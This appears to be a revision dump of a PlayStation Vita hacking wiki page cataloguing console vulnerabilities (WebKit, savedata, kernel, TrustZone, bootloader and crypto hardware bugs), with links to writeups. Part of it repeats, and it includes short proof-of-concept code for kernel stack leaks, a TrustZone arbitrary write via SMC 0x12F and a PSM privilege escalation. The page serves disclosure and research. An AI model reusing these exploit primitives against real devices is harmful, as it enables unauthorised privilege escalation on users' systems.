The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated with <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Now that the sum of code_size and offset_code is 0, this calculation would underflow to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
<br />
== F00D Processor ==<br />
<br />
=== secure_kernel ===<br />
<br />
==== octopus exploit ====<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
==== Heap buffer overflow in update_service_sm ====<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11505Vulnerabilities2019-09-18T22:57:18Z<p>Xyz: </p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next PSVita kernel exploit, named 2050 and 2051. TheFloW also have a WebKit exploit and it may be same or different than xyz's.<br />
<br />
Working on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can overflow syscall table and cause an arbitrary kernel function pointer to be dereferenced then executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id will end the svc interrupt without clearing syscall table vaddr in r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
